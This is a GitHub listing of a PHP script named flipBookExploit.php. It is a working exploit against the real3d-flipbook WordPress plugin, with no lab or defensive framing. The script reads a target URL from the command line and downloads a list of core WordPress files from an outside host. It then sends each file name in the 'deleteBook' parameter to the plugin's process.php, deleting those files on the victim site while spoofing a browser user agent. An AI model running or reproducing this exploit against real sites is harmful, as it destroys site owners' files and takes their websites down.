-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathflipBookExploit.php
35 lines (22 loc) · 1017 Bytes
/
flipBookExploit.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
$userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13';
$shit = '/wp-content/plugins/real3d-flipbook/includes/process.php';
$filesOrder = json_decode(file_get_contents('http://makman.tk/wpFiles.json'), true);
//print_r($filesOrder['wpFiles'][0]);
$targetWebsite = (isset($argv[1]) ? $argv[1] : die());
for ($i=0; $i < count($filesOrder['wpFiles']) ; $i++) {
$post = [
'deleteBook' => addslashes("{$filesOrder['wpFiles'][$i]}"),
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $targetWebsite.$shit);
curl_setopt($ch,CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
// receive server response ...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec ($ch);
echo $server_output.'Deleting '. $filesOrder['wpFiles'][$i]."\n";
curl_close ($ch);
}
?>